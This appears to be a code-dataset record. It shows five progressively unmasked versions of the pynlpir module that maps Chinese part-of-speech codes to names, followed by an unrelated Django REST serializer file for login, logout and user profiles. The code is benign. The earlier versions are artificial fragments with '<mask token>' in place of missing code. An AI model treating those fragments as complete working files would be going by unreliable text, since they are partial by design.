"step-1": "<mask token>\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-2": "<mask token>\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-3": "<mask token>\nlogger = logging.getLogger('pynlpir.pos_map')\nPOS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (\n '汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),\n 'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',\n 'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',\n 'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),\n 'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),\n 'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (\n '时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (\n '方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',\n 'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词\"是\"',\n 'verb 是'), 'vyou': ('动词\"有\"', 'verb 有'), 'vf': ('趋向动词',\n 'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (\n '不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (\n '动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',\n 'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (\n '形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}\n ), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',\n 'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',\n 'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',\n 'demonstrative pronoun', {'rzt': ('时间指示代词',\n 'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',\n 'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',\n 'predicate demonstrative pronoun')}), 'ry': ('疑问代词',\n 'interrogative pronoun', {'ryt': ('时间疑问代词',\n 'temporal interrogative pronoun'), 'rys': ('处所疑问代词',\n 'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',\n 'predicate interrogative pronoun')}), 'rg': ('代词性语素',\n 'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',\n 'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (\n '量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 'qt': ('时量词',\n 'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',\n 'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',\n 'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',\n 'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',\n 'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',\n 'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',\n 'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),\n 'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',\n 'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (\n '来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),\n 'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (\n '语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',\n 'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (\n 'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (\n '表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',\n 'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':\n ('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',\n 'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),\n 'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (\n '问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',\n 'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),\n 'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),\n 'wb': ('百分号千分号', 'percent/per 
mille sign'), 'wh': ('单位符号',\n 'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (\n '略语', 'abbreviation')}\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-4": "<mask token>\nimport logging\nlogger = logging.getLogger('pynlpir.pos_map')\nPOS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (\n '汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),\n 'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',\n 'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',\n 'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),\n 'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),\n 'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (\n '时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (\n '方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',\n 'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词\"是\"',\n 'verb 是'), 'vyou': ('动词\"有\"', 'verb 有'), 'vf': ('趋向动词',\n 'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (\n '不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (\n '动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',\n 'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (\n '形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}\n ), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',\n 'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',\n 'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',\n 'demonstrative pronoun', {'rzt': ('时间指示代词',\n 'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',\n 'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',\n 'predicate demonstrative pronoun')}), 'ry': ('疑问代词',\n 'interrogative pronoun', {'ryt': ('时间疑问代词',\n 'temporal interrogative pronoun'), 'rys': ('处所疑问代词',\n 'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',\n 'predicate interrogative pronoun')}), 'rg': ('代词性语素',\n 'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',\n 'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (\n '量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 'qt': ('时量词',\n 'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',\n 'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',\n 'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',\n 'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',\n 'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',\n 'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',\n 'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),\n 'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',\n 'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (\n '来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),\n 'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (\n '语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',\n 'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (\n 'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (\n '表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',\n 'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':\n ('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',\n 'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),\n 'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (\n '问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',\n 'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),\n 'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),\n 'wb': 
('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',\n 'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (\n '略语', 'abbreviation')}\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Part of speech mapping constants and functions for NLPIR/ICTCLAS.\n\nThis module is used by :mod:`pynlpir` to format segmented words for output.\n\n\"\"\"\nimport logging\n\n\nlogger = logging.getLogger(\"pynlpir.pos_map\")\n\n#: A dictionary that maps part of speech codes returned by NLPIR to\n#: human-readable names (English and Chinese).\nPOS_MAP = {\n \"n\": (\n \"名词\",\n \"noun\",\n {\n \"nr\": (\n \"人名\",\n \"personal name\",\n {\n \"nr1\": (\"汉语姓氏\", \"Chinese surname\"),\n \"nr2\": (\"汉语名字\", \"Chinese given name\"),\n \"nrj\": (\"日语人名\", \"Japanese personal name\"),\n \"nrf\": (\"音译人名\", \"transcribed personal name\"),\n },\n ),\n \"ns\": (\n \"地名\",\n \"toponym\",\n {\n \"nsf\": (\"音译地名\", \"transcribed toponym\"),\n },\n ),\n \"nt\": (\"机构团体名\", \"organization/group name\"),\n \"nz\": (\"其它专名\", \"other proper noun\"),\n \"nl\": (\"名词性惯用语\", \"noun phrase\"),\n \"ng\": (\"名词性语素\", \"noun morpheme\"),\n },\n ),\n \"t\": (\n \"时间词\",\n \"time word\",\n {\n \"tg\": (\"时间词性语素\", \"time morpheme\"),\n },\n ),\n \"s\": (\"处所词\", \"locative word\"),\n \"f\": (\"方位词\", \"noun of locality\"),\n \"v\": (\n \"动词\",\n \"verb\",\n {\n \"vd\": (\"副动词\", \"auxiliary verb\"),\n \"vn\": (\"名动词\", \"noun-verb\"),\n \"vshi\": ('动词\"是\"', \"verb 是\"),\n \"vyou\": ('动词\"有\"', \"verb 有\"),\n \"vf\": (\"趋向动词\", \"directional verb\"),\n \"vx\": (\"行事动词\", \"performative verb\"),\n \"vi\": (\"不及物动词\", \"intransitive verb\"),\n \"vl\": (\"动词性惯用语\", \"verb phrase\"),\n \"vg\": (\"动词性语素\", \"verb morpheme\"),\n },\n ),\n \"a\": (\n \"形容词\",\n \"adjective\",\n {\n \"ad\": (\"副形词\", \"auxiliary adjective\"),\n \"an\": (\"名形词\", \"noun-adjective\"),\n \"ag\": (\"形容词性语素\", \"adjective morpheme\"),\n \"al\": (\"形容词性惯用语\", \"adjective phrase\"),\n },\n ),\n \"b\": (\n \"区别词\",\n \"distinguishing word\",\n {\n \"bl\": (\"区别词性惯用语\", \"distinguishing phrase\"),\n },\n ),\n \"z\": (\"状态词\", \"status word\"),\n \"r\": (\n \"代词\",\n \"pronoun\",\n {\n \"rr\": (\"人称代词\", \"personal pronoun\"),\n \"rz\": (\n \"指示代词\",\n \"demonstrative pronoun\",\n {\n \"rzt\": (\"时间指示代词\", \"temporal demonstrative pronoun\"),\n \"rzs\": (\"处所指示代词\", \"locative demonstrative pronoun\"),\n \"rzv\": (\"谓词性指示代词\", \"predicate demonstrative pronoun\"),\n },\n ),\n \"ry\": (\n \"疑问代词\",\n \"interrogative pronoun\",\n {\n \"ryt\": (\"时间疑问代词\", \"temporal interrogative pronoun\"),\n \"rys\": (\"处所疑问代词\", \"locative interrogative pronoun\"),\n \"ryv\": (\"谓词性疑问代词\", \"predicate interrogative pronoun\"),\n },\n ),\n \"rg\": (\"代词性语素\", \"pronoun morpheme\"),\n },\n ),\n \"m\": (\n \"数词\",\n \"numeral\",\n {\n \"mq\": (\"数量词\", \"numeral-plus-classifier compound\"),\n \"mg\": (\"干支\", \"zodiac\"),\n },\n ),\n \"q\": (\n \"量词\",\n \"classifier\",\n {\n \"qv\": (\"动量词\", \"verbal classifier\"),\n \"qt\": (\"时量词\", \"temporal classifier\"),\n },\n ),\n \"d\": (\"副词\", \"adverb\"),\n \"p\": (\n \"介词\",\n \"preposition\",\n {\n \"pba\": (\"介词“把”\", \"preposition 把\"),\n \"pbei\": (\"介词“被”\", \"preposition 被\"),\n },\n ),\n \"c\": (\n \"连词\",\n \"conjunction\",\n {\n \"cc\": (\"并列连词\", \"coordinating conjunction\"),\n },\n ),\n \"u\": (\n \"助词\",\n \"particle\",\n {\n \"uzhe\": (\"着\", \"particle 着\"),\n \"ule\": (\"了/喽\", \"particle 了/喽\"),\n \"uguo\": (\"过\", \"particle 过\"),\n \"ude1\": (\"的/底\", \"particle 的/底\"),\n \"ude2\": (\"地\", \"particle 地\"),\n \"ude3\": (\"得\", \"particle 得\"),\n \"usuo\": (\"所\", \"particle 所\"),\n \"udeng\": (\"等/等等/云云\", \"particle 等/等等/云云\"),\n \"uyy\": (\"一样/一般/似的/般\", 
\"particle 一样/一般/似的/般\"),\n \"udh\": (\"的话\", \"particle 的话\"),\n \"uls\": (\"来讲/来说/而言/说来\", \"particle 来讲/来说/而言/说来\"),\n \"uzhi\": (\"之\", \"particle 之\"),\n \"ulian\": (\"连\", \"particle 连\"),\n },\n ),\n \"e\": (\"叹词\", \"interjection\"),\n \"y\": (\"语气词\", \"modal particle\"),\n \"o\": (\"拟声词\", \"onomatopoeia\"),\n \"h\": (\"前缀\", \"prefix\"),\n \"k\": (\"后缀\", \"suffix\"),\n \"x\": (\n \"字符串\",\n \"string\",\n {\n \"xe\": (\"Email字符串\", \"email address\"),\n \"xs\": (\"微博会话分隔符\", \"hashtag\"),\n \"xm\": (\"表情符合\", \"emoticon\"),\n \"xu\": (\"网址URL\", \"URL\"),\n \"xx\": (\"非语素字\", \"non-morpheme character\"),\n },\n ),\n \"w\": (\n \"标点符号\",\n \"punctuation mark\",\n {\n \"wkz\": (\"左括号\", \"left parenthesis/bracket\"),\n \"wky\": (\"右括号\", \"right parenthesis/bracket\"),\n \"wyz\": (\"左引号\", \"left quotation mark\"),\n \"wyy\": (\"右引号\", \"right quotation mark\"),\n \"wj\": (\"句号\", \"period\"),\n \"ww\": (\"问号\", \"question mark\"),\n \"wt\": (\"叹号\", \"exclamation mark\"),\n \"wd\": (\"逗号\", \"comma\"),\n \"wf\": (\"分号\", \"semicolon\"),\n \"wn\": (\"顿号\", \"enumeration comma\"),\n \"wm\": (\"冒号\", \"colon\"),\n \"ws\": (\"省略号\", \"ellipsis\"),\n \"wp\": (\"破折号\", \"dash\"),\n \"wb\": (\"百分号千分号\", \"percent/per mille sign\"),\n \"wh\": (\"单位符号\", \"unit of measure sign\"),\n },\n ),\n \"g\": (\"复合语\", \"multiword expression\"),\n \"j\": (\"略语\", \"abbreviation\"),\n}\n\n\ndef _get_pos_name(pos_code, names=\"parent\", english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in (\"parent\", \"child\", \"all\", \"raw\"):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or \"\n \"'raw'; not '{0}'\".format(names)\n )\n logger.debug(\n \"Getting {0} POS name for '{1}' formatted as '{2}'.\".format(\n \"English\" if english else \"Chinese\", pos_code, names\n )\n )\n if names == \"raw\":\n return pos_code\n pos_code = pos_code.lower() # Issue #10\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".format(pos_code))\n return None # Issue #20\n pos = (pos_entry[1 if english else 0],)\n if names == \"parent\":\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to \"\n \"look for child name for '{1}'\".format(pos_entry[1], pos_code)\n )\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n\n if names == \"all\":\n # sub_pos can be None sometimes (e.g. for a word '甲')\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = (sub_pos,)\n\n name = pos if names == \"all\" else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name=\"parent\", english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. 
``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
from django.shortcuts import get_object_or_404
from rest_framework import serializers
from tandlr.core.api.serializers import ModelSerializer
from tandlr.users.models import DeviceUser, User, UserSettings
from tandlr.utils.refresh_token import create_token
class LoginSerializer(serializers.Serializer):
email = serializers.EmailField(
required=True
)
password = serializers.CharField(
required=True
)
device_user_token = serializers.CharField(
max_length=250,
allow_blank=True,
required=False
)
device_os = serializers.CharField(
max_length=30,
allow_blank=False
)
def validate(self, data):
"""
        Validate the user's credentials (email and password).
"""
try:
user = User.objects.get(email__iexact=data.get('email'))
except User.DoesNotExist:
raise serializers.ValidationError("invalid credentials")
if not user.check_password(data.get('password')):
raise serializers.ValidationError("invalid credentials")
return data
def create(self, validated_data):
        # Validate that the email belongs to an existing user
user = get_object_or_404(User, email=validated_data.get('email'))
device_user_token = validated_data.get('device_user_token')
device_os = validated_data.get('device_os')
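        # APNs device tokens are 64 hexadecimal characters, so a 64-character
        # token with no reported OS is assumed to come from an iOS device.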
if (isinstance(device_user_token, unicode) and
len(device_user_token) == 64 and
(not device_os or device_os == '')):
device_os = 'iOS'
# Save data of the device
device, created = DeviceUser.objects.get_or_create(
user=user,
device_user_token=device_user_token
)
device.device_os = device_os
device.is_active = True
device.save()
return user
class LogoutSerializer(ModelSerializer):
"""
Serializer for log users out.
"""
is_active = serializers.ReadOnlyField()
class Meta:
model = DeviceUser
fields = ['device_user_token', 'device_os', 'is_active']
def validate(self, data):
"""
Validate that the requesting user owns the given device.
"""
request = self.context['request']
data.setdefault('user', request.user)
data.setdefault('device_user_token', None)
if not request.user.is_authenticated():
raise serializers.ValidationError('user is not logged in.')
try:
self.instance = DeviceUser.objects.get(**data)
except DeviceUser.DoesNotExist:
raise serializers.ValidationError('invalid device')
return data
def update(self):
"""
Mark the given device as inactive.
"""
self.instance.is_active = False
self.instance.save()
return self.instance
class UserSettingsSerializer(serializers.ModelSerializer):
class Meta:
model = UserSettings
fields = (
'id',
'session_confirm',
'message',
'session_cancellation',
'location_change',
'session_reminder',
'available',
'push_notifications_enabled'
)
class UserProfileDetailSerializer(serializers.ModelSerializer):
token = serializers.SerializerMethodField()
settings = UserSettingsSerializer()
class Meta:
model = User
fields = (
'id', 'username', 'name', 'last_name',
'second_last_name', 'description', 'photo', 'email',
'phone', 'zip_code', 'birthday', 'gender', 'is_student',
'is_teacher', 'token', 'settings'
)
def get_token(self, obj):
"""
Create token.
"""
return create_token(obj)
class LoginResponseV2Serializer(serializers.ModelSerializer):
"""
Serializer used to return the proper token, when the user was succesfully
logged in.
"""
token = serializers.SerializerMethodField()
class Meta:
model = User
fields = ('token', )
def get_token(self, obj):
"""
Create token.
"""
return create_token(obj)
|
normal
|
{
"blob_id": "01900c1d14a04ee43553c8602a07e0c6ecfabded",
"index": 1803,
"step-1": "<mask token>\n\n\nclass LogoutSerializer(ModelSerializer):\n <mask token>\n <mask token>\n\n\n class Meta:\n model = DeviceUser\n fields = ['device_user_token', 'device_os', 'is_active']\n <mask token>\n <mask token>\n\n\nclass UserSettingsSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = UserSettings\n fields = ('id', 'session_confirm', 'message',\n 'session_cancellation', 'location_change', 'session_reminder',\n 'available', 'push_notifications_enabled')\n\n\nclass UserProfileDetailSerializer(serializers.ModelSerializer):\n token = serializers.SerializerMethodField()\n settings = UserSettingsSerializer()\n\n\n class Meta:\n model = User\n fields = ('id', 'username', 'name', 'last_name', 'second_last_name',\n 'description', 'photo', 'email', 'phone', 'zip_code',\n 'birthday', 'gender', 'is_student', 'is_teacher', 'token',\n 'settings')\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n\n\nclass LoginResponseV2Serializer(serializers.ModelSerializer):\n \"\"\"\n Serializer used to return the proper token, when the user was succesfully\n logged in.\n \"\"\"\n token = serializers.SerializerMethodField()\n\n\n class Meta:\n model = User\n 